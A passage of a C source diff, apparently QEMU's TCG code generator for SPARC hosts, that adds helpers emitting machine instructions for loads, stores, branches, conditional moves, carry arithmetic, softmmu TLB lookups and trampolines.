*/ + if (check_fit_i32(lo, 13)) { + hi = (arg - lo) >> 32; + tcg_out_movi(s, TCG_TYPE_I32, ret, hi); + tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); + tcg_out_arithi(s, ret, ret, lo, ARITH_ADD); + } else { + hi = arg >> 32; + tcg_out_movi(s, TCG_TYPE_I32, ret, hi); + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_T2, lo); + tcg_out_arithi(s, ret, ret, 32, SHIFT_SLLX); + tcg_out_arith(s, ret, ret, TCG_REG_T2, ARITH_OR); + } +} + +static inline void tcg_out_ldst_rr(TCGContext *s, TCGReg data, TCGReg a1, + TCGReg a2, int op) +{ + tcg_out32(s, op | INSN_RD(data) | INSN_RS1(a1) | INSN_RS2(a2)); +} + +static void tcg_out_ldst(TCGContext *s, TCGReg ret, TCGReg addr, + intptr_t offset, int op) +{ + if (check_fit_ptr(offset, 13)) { + tcg_out32(s, op | INSN_RD(ret) | INSN_RS1(addr) | + INSN_IMM13(offset)); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, offset); + tcg_out_ldst_rr(s, ret, addr, TCG_REG_T1, op); + } +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, ret, arg1, arg2, (type == TCG_TYPE_I32 ? LDUW : LDX)); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, arg, arg1, arg2, (type == TCG_TYPE_I32 ? STW : STX)); +} + +static void tcg_out_ld_ptr(TCGContext *s, TCGReg ret, uintptr_t arg) +{ + tcg_out_movi(s, TCG_TYPE_PTR, ret, arg & ~0x3ff); + tcg_out_ld(s, TCG_TYPE_PTR, ret, ret, arg & 0x3ff); +} + +static inline void tcg_out_sety(TCGContext *s, TCGReg rs) +{ + tcg_out32(s, WRY | INSN_RS1(TCG_REG_G0) | INSN_RS2(rs)); +} + +static inline void tcg_out_rdy(TCGContext *s, TCGReg rd) +{ + tcg_out32(s, RDY | INSN_RD(rd)); +} + +static void tcg_out_div32(TCGContext *s, TCGReg rd, TCGReg rs1, + int32_t val2, int val2const, int uns) +{ + /* Load Y with the sign/zero extension of RS1 to 64-bits. 
*/ + if (uns) { + tcg_out_sety(s, TCG_REG_G0); + } else { + tcg_out_arithi(s, TCG_REG_T1, rs1, 31, SHIFT_SRA); + tcg_out_sety(s, TCG_REG_T1); + } + + tcg_out_arithc(s, rd, rs1, val2, val2const, + uns ? ARITH_UDIV : ARITH_SDIV); +} + +static inline void tcg_out_nop(TCGContext *s) +{ + tcg_out_sethi(s, TCG_REG_G0, 0); +} + +static const uint8_t tcg_cond_to_bcond[] = { + [TCG_COND_EQ] = COND_E, + [TCG_COND_NE] = COND_NE, + [TCG_COND_LT] = COND_L, + [TCG_COND_GE] = COND_GE, + [TCG_COND_LE] = COND_LE, + [TCG_COND_GT] = COND_G, + [TCG_COND_LTU] = COND_CS, + [TCG_COND_GEU] = COND_CC, + [TCG_COND_LEU] = COND_LEU, + [TCG_COND_GTU] = COND_GU, +}; + +static const uint8_t tcg_cond_to_rcond[] = { + [TCG_COND_EQ] = RCOND_Z, + [TCG_COND_NE] = RCOND_NZ, + [TCG_COND_LT] = RCOND_LZ, + [TCG_COND_GT] = RCOND_GZ, + [TCG_COND_LE] = RCOND_LEZ, + [TCG_COND_GE] = RCOND_GEZ +}; + +static void tcg_out_bpcc0(TCGContext *s, int scond, int flags, int off19) +{ + tcg_out32(s, INSN_OP(0) | INSN_OP2(1) | INSN_COND(scond) | flags | off19); +} + +static void tcg_out_bpcc(TCGContext *s, int scond, int flags, int label) +{ + TCGLabel *l = &s->labels[label]; + int off19; + + if (l->has_value) { + off19 = INSN_OFF19(tcg_pcrel_diff(s, l->u.value_ptr)); + } else { + /* Make sure to preserve destinations during retranslation. 
*/ + off19 = *s->code_ptr & INSN_OFF19(-1); + tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP19, label, 0); + } + tcg_out_bpcc0(s, scond, flags, off19); +} + +static void tcg_out_cmp(TCGContext *s, TCGReg c1, int32_t c2, int c2const) +{ + tcg_out_arithc(s, TCG_REG_G0, c1, c2, c2const, ARITH_SUBCC); +} + +static void tcg_out_brcond_i32(TCGContext *s, TCGCond cond, TCGReg arg1, + int32_t arg2, int const_arg2, int label) +{ + tcg_out_cmp(s, arg1, arg2, const_arg2); + tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_ICC | BPCC_PT, label); + tcg_out_nop(s); +} + +static void tcg_out_movcc(TCGContext *s, TCGCond cond, int cc, TCGReg ret, + int32_t v1, int v1const) +{ + tcg_out32(s, ARITH_MOVCC | cc | INSN_RD(ret) + | INSN_RS1(tcg_cond_to_bcond[cond]) + | (v1const ? INSN_IMM11(v1) : INSN_RS2(v1))); +} + +static void tcg_out_movcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const, + int32_t v1, int v1const) +{ + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movcc(s, cond, MOVCC_ICC, ret, v1, v1const); +} + +static void tcg_out_brcond_i64(TCGContext *s, TCGCond cond, TCGReg arg1, + int32_t arg2, int const_arg2, int label) +{ + /* For 64-bit signed comparisons vs zero, we can avoid the compare. */ + if (arg2 == 0 && !is_unsigned_cond(cond)) { + TCGLabel *l = &s->labels[label]; + int off16; + + if (l->has_value) { + off16 = INSN_OFF16(tcg_pcrel_diff(s, l->u.value_ptr)); + } else { + /* Make sure to preserve destinations during retranslation. 
*/ + off16 = *s->code_ptr & INSN_OFF16(-1); + tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP16, label, 0); + } + tcg_out32(s, INSN_OP(0) | INSN_OP2(3) | BPR_PT | INSN_RS1(arg1) + | INSN_COND(tcg_cond_to_rcond[cond]) | off16); + } else { + tcg_out_cmp(s, arg1, arg2, const_arg2); + tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_XCC | BPCC_PT, label); + } + tcg_out_nop(s); +} + +static void tcg_out_movr(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, + int32_t v1, int v1const) +{ + tcg_out32(s, ARITH_MOVR | INSN_RD(ret) | INSN_RS1(c1) + | (tcg_cond_to_rcond[cond] << 10) + | (v1const ? INSN_IMM10(v1) : INSN_RS2(v1))); +} + +static void tcg_out_movcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const, + int32_t v1, int v1const) +{ + /* For 64-bit signed comparisons vs zero, we can avoid the compare. + Note that the immediate range is one bit smaller, so we must check + for that as well. */ + if (c2 == 0 && !is_unsigned_cond(cond) + && (!v1const || check_fit_i32(v1, 10))) { + tcg_out_movr(s, cond, ret, c1, v1, v1const); + } else { + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movcc(s, cond, MOVCC_XCC, ret, v1, v1const); + } +} + +static void tcg_out_setcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const) +{ + /* For 32-bit comparisons, we can play games with ADDC/SUBC. */ + switch (cond) { + case TCG_COND_LTU: + case TCG_COND_GEU: + /* The result of the comparison is in the carry bit. */ + break; + + case TCG_COND_EQ: + case TCG_COND_NE: + /* For equality, we can transform to inequality vs zero. */ + if (c2 != 0) { + tcg_out_arithc(s, TCG_REG_T1, c1, c2, c2const, ARITH_XOR); + c2 = TCG_REG_T1; + } else { + c2 = c1; + } + c1 = TCG_REG_G0, c2const = 0; + cond = (cond == TCG_COND_EQ ? TCG_COND_GEU : TCG_COND_LTU); + break; + + case TCG_COND_GTU: + case TCG_COND_LEU: + /* If we don't need to load a constant into a register, we can + swap the operands on GTU/LEU. 
There's no benefit to loading + the constant into a temporary register. */ + if (!c2const || c2 == 0) { + TCGReg t = c1; + c1 = c2; + c2 = t; + c2const = 0; + cond = tcg_swap_cond(cond); + break; + } + /* FALLTHRU */ + + default: + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movi_imm13(s, ret, 0); + tcg_out_movcc(s, cond, MOVCC_ICC, ret, 1, 1); + return; + } + + tcg_out_cmp(s, c1, c2, c2const); + if (cond == TCG_COND_LTU) { + tcg_out_arithi(s, ret, TCG_REG_G0, 0, ARITH_ADDC); + } else { + tcg_out_arithi(s, ret, TCG_REG_G0, -1, ARITH_SUBC); + } +} + +static void tcg_out_setcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const) +{ + if (use_vis3_instructions) { + switch (cond) { + case TCG_COND_NE: + if (c2 != 0) { + break; + } + c2 = c1, c2const = 0, c1 = TCG_REG_G0; + /* FALLTHRU */ + case TCG_COND_LTU: + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_arith(s, ret, TCG_REG_G0, TCG_REG_G0, ARITH_ADDXC); + return; + default: + break; + } + } + + /* For 64-bit signed comparisons vs zero, we can avoid the compare + if the input does not overlap the output. */ + if (c2 == 0 && !is_unsigned_cond(cond) && c1 != ret) { + tcg_out_movi_imm13(s, ret, 0); + tcg_out_movr(s, cond, ret, c1, 1, 1); + } else { + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movi_imm13(s, ret, 0); + tcg_out_movcc(s, cond, MOVCC_XCC, ret, 1, 1); + } +} + +static void tcg_out_addsub2_i32(TCGContext *s, TCGReg rl, TCGReg rh, + TCGReg al, TCGReg ah, int32_t bl, int blconst, + int32_t bh, int bhconst, int opl, int oph) +{ + TCGReg tmp = TCG_REG_T1; + + /* Note that the low parts are fully consumed before tmp is set. 
*/ + if (rl != ah && (bhconst || rl != bh)) { + tmp = rl; + } + + tcg_out_arithc(s, tmp, al, bl, blconst, opl); + tcg_out_arithc(s, rh, ah, bh, bhconst, oph); + tcg_out_mov(s, TCG_TYPE_I32, rl, tmp); +} + +static void tcg_out_addsub2_i64(TCGContext *s, TCGReg rl, TCGReg rh, + TCGReg al, TCGReg ah, int32_t bl, int blconst, + int32_t bh, int bhconst, bool is_sub) +{ + TCGReg tmp = TCG_REG_T1; + + /* Note that the low parts are fully consumed before tmp is set. */ + if (rl != ah && (bhconst || rl != bh)) { + tmp = rl; + } + + tcg_out_arithc(s, tmp, al, bl, blconst, is_sub ? ARITH_SUBCC : ARITH_ADDCC); + + if (use_vis3_instructions && !is_sub) { + /* Note that ADDXC doesn't accept immediates. */ + if (bhconst && bh != 0) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh); + bh = TCG_REG_T2; + } + tcg_out_arith(s, rh, ah, bh, ARITH_ADDXC); + } else if (bh == TCG_REG_G0) { + /* If we have a zero, we can perform the operation in two insns, + with the arithmetic first, and a conditional move into place. */ + if (rh == ah) { + tcg_out_arithi(s, TCG_REG_T2, ah, 1, + is_sub ? ARITH_SUB : ARITH_ADD); + tcg_out_movcc(s, TCG_COND_LTU, MOVCC_XCC, rh, TCG_REG_T2, 0); + } else { + tcg_out_arithi(s, rh, ah, 1, is_sub ? ARITH_SUB : ARITH_ADD); + tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, rh, ah, 0); + } + } else { + /* Otherwise adjust BH as if there is carry into T2 ... */ + if (bhconst) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh + (is_sub ? -1 : 1)); + } else { + tcg_out_arithi(s, TCG_REG_T2, bh, 1, + is_sub ? ARITH_SUB : ARITH_ADD); + } + /* ... smoosh T2 back to original BH if carry is clear ... */ + tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, TCG_REG_T2, bh, bhconst); + /* ... and finally perform the arithmetic with the new operand. */ + tcg_out_arith(s, rh, ah, TCG_REG_T2, is_sub ? 
ARITH_SUB : ARITH_ADD); + } + + tcg_out_mov(s, TCG_TYPE_I64, rl, tmp); +} + +static void tcg_out_call_nodelay(TCGContext *s, tcg_insn_unit *dest) +{ + ptrdiff_t disp = tcg_pcrel_diff(s, dest); + + if (disp == (int32_t)disp) { + tcg_out32(s, CALL | (uint32_t)disp >> 2); + } else { + uintptr_t desti = (uintptr_t)dest; + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, desti & ~0xfff); + tcg_out_arithi(s, TCG_REG_O7, TCG_REG_T1, desti & 0xfff, JMPL); + } +} + +static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) +{ + tcg_out_call_nodelay(s, dest); + tcg_out_nop(s); +} + +#ifdef CONFIG_SOFTMMU +static tcg_insn_unit *qemu_ld_trampoline[16]; +static tcg_insn_unit *qemu_st_trampoline[16]; + +static void build_trampolines(TCGContext *s) +{ + static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_SB] = helper_ret_ldsb_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LESW] = helper_le_ldsw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BESW] = helper_be_ldsw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, + }; + static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, + }; + + int i; + TCGReg ra; + + for (i = 0; i < 16; ++i) { + if (qemu_ld_helpers[i] == NULL) { + continue; + } + + /* May as well align the trampoline. */ + while ((uintptr_t)s->code_ptr & 15) { + tcg_out_nop(s); + } + qemu_ld_trampoline[i] = s->code_ptr; + + if (SPARC64 || TARGET_LONG_BITS == 32) { + ra = TCG_REG_O3; + } else { + /* Install the high part of the address. */ + tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O2, 32, SHIFT_SRLX); + ra = TCG_REG_O4; + } + + /* Set the retaddr operand. */ + tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); + /* Set the env operand. 
*/ + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); + /* Tail call. */ + tcg_out_call_nodelay(s, qemu_ld_helpers[i]); + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); + } + + for (i = 0; i < 16; ++i) { + if (qemu_st_helpers[i] == NULL) { + continue; + } + + /* May as well align the trampoline. */ + while ((uintptr_t)s->code_ptr & 15) { + tcg_out_nop(s); + } + qemu_st_trampoline[i] = s->code_ptr; + + if (SPARC64) { + ra = TCG_REG_O4; + } else { + ra = TCG_REG_O1; + if (TARGET_LONG_BITS == 64) { + /* Install the high part of the address. */ + tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); + ra += 2; + } else { + ra += 1; + } + if ((i & MO_SIZE) == MO_64) { + /* Install the high part of the data. */ + tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); + ra += 2; + } else { + ra += 1; + } + /* Skip the mem_index argument. */ + ra += 1; + } + + /* Set the retaddr operand. */ + if (ra >= TCG_REG_O6) { + tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_O7, TCG_REG_CALL_STACK, + TCG_TARGET_CALL_STACK_OFFSET); + ra = TCG_REG_G1; + } + tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); + /* Set the env operand. */ + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); + /* Tail call. */ + tcg_out_call_nodelay(s, qemu_st_helpers[i]); + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); + } +} +#endif + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int tmp_buf_size, frame_size; + + /* The TCG temp buffer is at the top of the frame, immediately + below the frame pointer. */ + tmp_buf_size = CPU_TEMP_BUF_NLONGS * (int)sizeof(long); + tcg_set_frame(s, TCG_REG_I6, TCG_TARGET_STACK_BIAS - tmp_buf_size, + tmp_buf_size); + + /* TCG_TARGET_CALL_STACK_OFFSET includes the stack bias, but is + otherwise the minimal frame usable by callees. 
*/ + frame_size = TCG_TARGET_CALL_STACK_OFFSET - TCG_TARGET_STACK_BIAS; + frame_size += TCG_STATIC_CALL_ARGS_SIZE + tmp_buf_size; + frame_size += TCG_TARGET_STACK_ALIGN - 1; + frame_size &= -TCG_TARGET_STACK_ALIGN; + tcg_out32(s, SAVE | INSN_RD(TCG_REG_O6) | INSN_RS1(TCG_REG_O6) | + INSN_IMM13(-frame_size)); + +#ifdef CONFIG_USE_GUEST_BASE + if (GUEST_BASE != 0) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, GUEST_BASE); + tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); + } +#endif + + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I1, 0, JMPL); + /* delay slot */ + tcg_out_nop(s); + + /* No epilogue required. We issue ret + restore directly in the TB. */ + +#ifdef CONFIG_SOFTMMU + build_trampolines(s); +#endif +} + +#if defined(CONFIG_SOFTMMU) +/* Perform the TLB load and compare. + + Inputs: + ADDRLO and ADDRHI contain the possible two parts of the address. + + MEM_INDEX and S_BITS are the memory context and log2 size of the load. + + WHICH is the offset into the CPUTLBEntry structure of the slot to read. + This should be offsetof addr_read or addr_write. + + The result of the TLB comparison is in %[ix]cc. The sanitized address + is in the returned register, maybe %o0. The TLB addend is in %o1. */ + +static TCGReg tcg_out_tlb_load(TCGContext *s, TCGReg addr, int mem_index, + TCGMemOp s_bits, int which) +{ + const TCGReg r0 = TCG_REG_O0; + const TCGReg r1 = TCG_REG_O1; + const TCGReg r2 = TCG_REG_O2; + int tlb_ofs; + + /* Shift the page number down. */ + tcg_out_arithi(s, r1, addr, TARGET_PAGE_BITS, SHIFT_SRL); + + /* Mask out the page offset, except for the required alignment. */ + tcg_out_movi(s, TCG_TYPE_TL, TCG_REG_T1, + TARGET_PAGE_MASK | ((1 << s_bits) - 1)); + + /* Mask the tlb index. */ + tcg_out_arithi(s, r1, r1, CPU_TLB_SIZE - 1, ARITH_AND); + + /* Mask page, part 2. */ + tcg_out_arith(s, r0, addr, TCG_REG_T1, ARITH_AND); + + /* Shift the tlb index into place. 
*/ + tcg_out_arithi(s, r1, r1, CPU_TLB_ENTRY_BITS, SHIFT_SLL); + + /* Relative to the current ENV. */ + tcg_out_arith(s, r1, TCG_AREG0, r1, ARITH_ADD); + + /* Find a base address that can load both tlb comparator and addend. */ + tlb_ofs = offsetof(CPUArchState, tlb_table[mem_index][0]); + if (!check_fit_ptr(tlb_ofs + sizeof(CPUTLBEntry), 13)) { + if (tlb_ofs & ~0x3ff) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, tlb_ofs & ~0x3ff); + tcg_out_arith(s, r1, r1, TCG_REG_T1, ARITH_ADD); + } + tlb_ofs &= 0x3ff; + } + + /* Load the tlb comparator and the addend. */ + tcg_out_ld(s, TCG_TYPE_TL, r2, r1, tlb_ofs + which); + tcg_out_ld(s, TCG_TYPE_PTR, r1, r1, tlb_ofs+offsetof(CPUTLBEntry, addend)); + + /* subcc arg0, arg2, %g0 */ + tcg_out_cmp(s, r0, r2, 0); + + /* If the guest address must be zero-extended, do so now. */ + if (SPARC64 && TARGET_LONG_BITS == 32) { + tcg_out_arithi(s, r0, addr, 0, SHIFT_SRL); + return r0; + } + return addr; +} +#endif /* CONFIG_SOFTMMU */ + +static const int qemu_ld_opc[16] = { + [MO_UB] = LDUB, + [MO_SB] = LDSB, + + [MO_BEUW] = LDUH, + [MO_BESW] = LDSH, + [MO_BEUL] = LDUW, + [MO_BESL] = LDSW, + [MO_BEQ] = LDX, + + [MO_LEUW] = LDUH_LE, + [MO_LESW] = LDSH_LE, + [MO_LEUL] = LDUW_LE, + [MO_LESL] = LDSW_LE, + [MO_LEQ] = LDX_LE, +}; + +static const int qemu_st_opc[16] = { + [MO_UB] = STB, + + [MO_BEUW] = STH, + [MO_BEUL] = STW, + [MO_BEQ] = STX, + + [MO_LEUW] = STH_LE, + [MO_LEUL] = STW_LE, + [MO_LEQ] = STX_LE, +}; + +static void tcg_out_qemu_ld(TCGContext *s, TCGReg data, TCGReg addr, + TCGMemOp memop, int memi, bool is_64) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + TCGReg addrz, param; + tcg_insn_unit *func; + tcg_insn_unit *label_ptr; + + addrz = tcg_out_tlb_load(s, addr, memi, s_bits, + offsetof(CPUTLBEntry, addr_read)); + + /* The fast path is exactly one insn. Thus we can perform the + entire TLB Hit in the (annulled) delay slot of the branch + over the TLB Miss case. 
*/ + + /* beq,a,pt %[xi]cc, label0 */ + label_ptr = s->code_ptr; + tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT + | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); + /* delay slot */ + tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_ld_opc[memop]); + + /* TLB Miss. */ + + param = TCG_REG_O1; + if (!SPARC64 && TARGET_LONG_BITS == 64) { + /* Skip the high-part; we'll perform the extract in the trampoline. */ + param++; + } + tcg_out_mov(s, TCG_TYPE_REG, param++, addr); + + /* We use the helpers to extend SB and SW data, leaving the case + of SL needing explicit extending below. */ + if ((memop & ~MO_BSWAP) == MO_SL) { + func = qemu_ld_trampoline[memop & ~MO_SIGN]; + } else { + func = qemu_ld_trampoline[memop]; + } + assert(func != NULL); + tcg_out_call_nodelay(s, func); + /* delay slot */ + tcg_out_movi(s, TCG_TYPE_I32, param, memi); + + /* Recall that all of the helpers return 64-bit results. + Which complicates things for sparcv8plus. */ + if (SPARC64) { + /* We let the helper sign-extend SB and SW, but leave SL for here. */ + if (is_64 && (memop & ~MO_BSWAP) == MO_SL) { + tcg_out_arithi(s, data, TCG_REG_O0, 0, SHIFT_SRA); + } else { + tcg_out_mov(s, TCG_TYPE_REG, data, TCG_REG_O0); + } + } else { + if (s_bits == MO_64) { + tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, 32, SHIFT_SLLX); + tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O1, 0, SHIFT_SRL); + tcg_out_arith(s, data, TCG_REG_O0, TCG_REG_O1, ARITH_OR); + } else if (is_64) { + /* Re-extend from 32-bit rather than reassembling when we + know the high register must be an extension. */ + tcg_out_arithi(s, data, TCG_REG_O1, 0, + memop & MO_SIGN ? SHIFT_SRA : SHIFT_SRL); + } else { + tcg_out_mov(s, TCG_TYPE_I32, data, TCG_REG_O1); + } + } + + *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); +#else + if (SPARC64 && TARGET_LONG_BITS == 32) { + tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); + addr = TCG_REG_T1; + } + tcg_out_ldst_rr(s, data, addr, + (GUEST_BASE ? 
TCG_GUEST_BASE_REG : TCG_REG_G0), + qemu_ld_opc[memop]); +#endif /* CONFIG_SOFTMMU */ +} + +static void tcg_out_qemu_st(TCGContext *s, TCGReg data, TCGReg addr, + TCGMemOp memop, int memi) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + TCGReg addrz, param; + tcg_insn_unit *func; + tcg_insn_unit *label_ptr; + + addrz = tcg_out_tlb_load(s, addr, memi, s_bits, + offsetof(CPUTLBEntry, addr_write)); + + /* The fast path is exactly one insn. Thus we can perform the entire + TLB Hit in the (annulled) delay slot of the branch over TLB Miss. */ + /* beq,a,pt %[xi]cc, label0 */ + label_ptr = s->code_ptr; + tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT + | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); + /* delay slot */ + tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_st_opc[memop]); + + /* TLB Miss. */ + + param = TCG_REG_O1; + if (!SPARC64 && TARGET_LONG_BITS == 64) { + /* Skip the high-part; we'll perform the extract in the trampoline. */ + param++; + } + tcg_out_mov(s, TCG_TYPE_REG, param++, addr); + if (!SPARC64 && s_bits == MO_64) { + /* Skip the high-part; we'll perform the extract in the trampoline. */ + param++; + } + tcg_out_mov(s, TCG_TYPE_REG, param++, data); + + func = qemu_st_trampoline[memop]; + assert(func != NULL); + tcg_out_call_nodelay(s, func); + /* delay slot */ + tcg_out_movi(s, TCG_TYPE_REG, param, memi); + + *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); +#else + if (SPARC64 && TARGET_LONG_BITS == 32) { + tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); + addr = TCG_REG_T1; + } + tcg_out_ldst_rr(s, data, addr, + (GUEST_BASE ? TCG_GUEST_BASE_REG : TCG_REG_G0), + qemu_st_opc[memop]); +#endif /* CONFIG_SOFTMMU */ +} + +static void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg args[TCG_MAX_OP_ARGS], + const int const_args[TCG_MAX_OP_ARGS]) +{ + TCGArg a0, a1, a2; + int c, c2; + + /* Hoist the loads of the most common arguments. 
*/ + a0 = args[0]; + a1 = args[1]; + a2 = args[2]; + c2 = const_args[2]; + + switch (opc) { + case INDEX_op_exit_tb: + if (check_fit_ptr(a0, 13)) { + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); + tcg_out_movi_imm13(s, TCG_REG_O0, a0); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_I0, a0 & ~0x3ff); + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); + tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, a0 & 0x3ff, ARITH_OR); + } + break; + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + /* direct jump method */ + s->tb_jmp_offset[a0] = tcg_current_code_size(s); + /* Make sure to preserve links during retranslation. */ + tcg_out32(s, CALL | (*s->code_ptr & ~INSN_OP(-1))); + } else { + /* indirect jump method */ + tcg_out_ld_ptr(s, TCG_REG_T1, (uintptr_t)(s->tb_next + a0)); + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_T1, 0, JMPL); + } + tcg_out_nop(s); + s->tb_next_offset[a0] = tcg_current_code_size(s); + break; + case INDEX_op_br: + tcg_out_bpcc(s, COND_A, BPCC_PT, a0); + tcg_out_nop(s); + break; + +#define OP_32_64(x) \ + glue(glue(case INDEX_op_, x), _i32): \ + glue(glue(case INDEX_op_, x), _i64) + + OP_32_64(ld8u): + tcg_out_ldst(s, a0, a1, a2, LDUB); + break; + OP_32_64(ld8s): + tcg_out_ldst(s, a0, a1, a2, LDSB); + break; + OP_32_64(ld16u): + tcg_out_ldst(s, a0, a1, a2, LDUH); + break; + OP_32_64(ld16s): + tcg_out_ldst(s, a0, a1, a2, LDSH); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_ldst(s, a0, a1, a2, LDUW); + break; + OP_32_64(st8): + tcg_out_ldst(s, a0, a1, a2, STB); + break; + OP_32_64(st16): + tcg_out_ldst(s, a0, a1, a2, STH); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_ldst(s, a0, a1, a2, STW); + break; + OP_32_64(add): + c = ARITH_ADD; + goto gen_arith; + OP_32_64(sub): + c = ARITH_SUB; + goto gen_arith; + OP_32_64(and): + c = ARITH_AND; + goto gen_arith; + OP_32_64(andc): + c = ARITH_ANDN; + goto gen_arith; + OP_32_64(or): + c = ARITH_OR; + goto gen_arith; + OP_32_64(orc): + c = ARITH_ORN; + goto 
gen_arith; + OP_32_64(xor): + c = ARITH_XOR; + goto gen_arith; + case INDEX_op_shl_i32: + c = SHIFT_SLL; + do_shift32: + /* Limit immediate shift count lest we create an illegal insn. */ + tcg_out_arithc(s, a0, a1, a2 & 31, c2, c); + break; + case INDEX_op_shr_i32: + c = SHIFT_SRL; + goto do_shift32; + case INDEX_op_sar_i32: + c = SHIFT_SRA; + goto do_shift32; + case INDEX_op_mul_i32: + c = ARITH_UMUL; + goto gen_arith; + + OP_32_64(neg): + c = ARITH_SUB; + goto gen_arith1; + OP_32_64(not): + c = ARITH_ORN; + goto gen_arith1; + + case INDEX_op_div_i32: + tcg_out_div32(s, a0, a1, a2, c2, 0); + break; + case INDEX_op_divu_i32: + tcg_out_div32(s, a0, a1, a2, c2, 1); + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond_i32(s, a2, a0, a1, const_args[1], args[3]); + break; + case INDEX_op_setcond_i32: + tcg_out_setcond_i32(s, args[3], a0, a1, a2, c2); + break; + case INDEX_op_movcond_i32: + tcg_out_movcond_i32(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); + break; + + case INDEX_op_add2_i32: + tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], + args[4], const_args[4], args[5], const_args[5], + ARITH_ADDCC, ARITH_ADDC); + break; + case INDEX_op_sub2_i32: + tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], + args[4], const_args[4], args[5], const_args[5], + ARITH_SUBCC, ARITH_SUBC); + break; + case INDEX_op_mulu2_i32: + c = ARITH_UMUL; + goto do_mul2; + case INDEX_op_muls2_i32: + c = ARITH_SMUL; + do_mul2: + /* The 32-bit multiply insns produce a full 64-bit result. If the + destination register can hold it, we can avoid the slower RDY. 
